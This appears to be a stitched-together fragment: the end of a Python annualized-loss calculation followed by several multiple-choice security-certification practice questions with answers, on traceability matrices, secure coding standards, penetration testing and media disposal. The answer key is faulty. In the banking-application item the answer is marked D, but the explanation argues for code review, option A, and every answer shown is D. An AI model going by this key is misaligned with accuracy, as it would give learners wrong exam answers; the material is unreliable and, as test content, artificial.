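# Figures from the question: $500,000/day, 12-hour order window, 6-hour MTTR,
# 1% daily chance of the system being brought down, 364 operating days.
RETAIL = annualized_loss(500_000, 12, 6, 0.01, 364)

if __name__ == "__main__":
    for key, value in RETAIL.items():
        print(f"{key}: {value:,.2f}")
```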
Your company's development team is working on a new application that will be used by the research and development department. Because of the critical nature of the data that will be stored in this application, security is extremely important. The development team has created a grid that connects the security requirements, implementation details, and testing details. What grid has been created? A. ACL B. SDLC C. RFID D. SRTM
Answer: D Explanation: The grid that has been created is the security requirements traceability matrix (SRTM).
You have been asked to improve the quality of the code produced by the software development team, so you are creating a secure coding standard document. Which of the following is NOT a topic that should be covered in the document? A. error handling B. input validation C. memory use and reuse D. performance metrics
Answer: D Explanation: Topics covered should include error handling, input validation, memory use and reuse, race condition handling, commenting, and preventing typical security problems.
Your company is going to launch a new version of a banking application. To ensure an appropriate security posture, the team performs penetration tests, using accounts with varying levels of access. Which of the following would be the best additional step to take? A. code review across critical modules B. performance testing C. port scanning in the network for open ports D. review of all patch levels on all servers
Answer: D Explanation: While all options are security related and good ideas, the most pressing need with respect to this application is code review.
Your company has decided to adopt a formal asset disposal policy for all desktop computers. Which of the following policies should be adopted? A. Reset the computer to its factory default. B. Format all hard drives. C. Back up all user data. D. Destroy all hard drives.
Answer: D Explanation: You should destroy all hard drives to ensure that the data on the hard drives cannot be retrieved.
You are the security practitioner for your company. The company has recently adopted a new asset disposal policy in which you are required to render any information stored on magnetic media unrecoverable by forensics methods. Which of the following should you use? A. data clearing B. remanence C. formatting D. data purging
Answer: D Explanation: You should opt for data purging, which uses a method such as degaussing to make the old data unavailable even with laboratory attacks (forensics). Purging renders information unrecoverable against forensics.